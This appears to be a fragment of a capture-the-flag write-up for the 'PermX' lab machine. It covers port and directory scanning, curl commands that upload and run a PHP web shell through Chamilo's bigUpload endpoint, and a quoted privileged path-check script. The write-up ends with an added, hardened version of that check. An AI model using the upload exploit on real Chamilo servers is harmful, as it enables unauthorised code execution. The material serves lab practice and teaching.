start infoscan
10.10.11.23:22 open
10.10.11.23:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://10.10.11.23 code:302 len:277 title:302 Found 跳转url: http://permx.htb
Add the entry to the hosts file.
Directory scan
gobuster dir -u http://permx.htb/ -w /usr/share/wordlists/dirb/common.txt
$ echo '<?php system("id"); ?>' > rce.php
$ curl -F 'bigUploadFile=@rce.php' 'http://<chamilo>/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
The file has successfully been uploaded.
$ curl 'http://<chamilo>/main/inc/lib/javascript/bigupload/files/rce.php'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
curl -F 'bigUploadFile=@rce.php' 'http://<chamilo>/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
The file has successfully been uploaded.
if [ "$#" -ne 3 ]; then
    /usr/bin/echo "Usage: $0 user perm file"
    exit 1
fi

user="$1"
perm="$2"
target="$3"

if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
    /usr/bin/echo "Access denied."
    exit 1
fi

# Check if the path is a file
if [ ! -f "$target" ]; then
    /usr/bin/echo "Target must be a file."
    exit 1
fi
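A stricter form of the path validation in the script above, as an added example that is not part of the original writeup or of the script it quotes: the pattern match and the `[ -f ]` test work on the path string and follow symbolic links, so this version resolves the path before comparing it. `check_target` and its base-directory argument are hypothetical names.

```bash
# Added example: validate that a user-supplied path is a regular file that
# really lives under a base directory. check_target is a hypothetical helper.
# Usage: check_target BASE_DIR TARGET   (prints the resolved path on success)
check_target() {
    local base target real_base real_target
    base="$1"
    target="$2"

    # [ -f ] follows symbolic links, so refuse a link as the final component.
    if [ -L "$target" ]; then
        echo "Symbolic links are not allowed." >&2
        return 1
    fi

    # Resolve every component (links in parent directories, "..", "//")
    # so the prefix test below runs on the real location.
    real_base=$(readlink -f -- "$base") || return 1
    real_target=$(readlink -f -- "$target") || return 1

    # The resolved path must exist and be a regular file.
    if [ ! -f "$real_target" ]; then
        echo "Target must be a file." >&2
        return 1
    fi

    # The resolved path must sit below the resolved base directory.
    # The quoted part is matched literally; only the trailing * is a glob.
    case "$real_target" in
        "$real_base"/*) ;;
        *)
            echo "Access denied." >&2
            return 1
            ;;
    esac

    # Callers should act on this resolved path, not on the original string.
    printf '%s\n' "$real_target"
}
```

A check followed by a separate action still leaves a window in which the path can change, so a privileged script should also keep the base directory unwritable by the calling user.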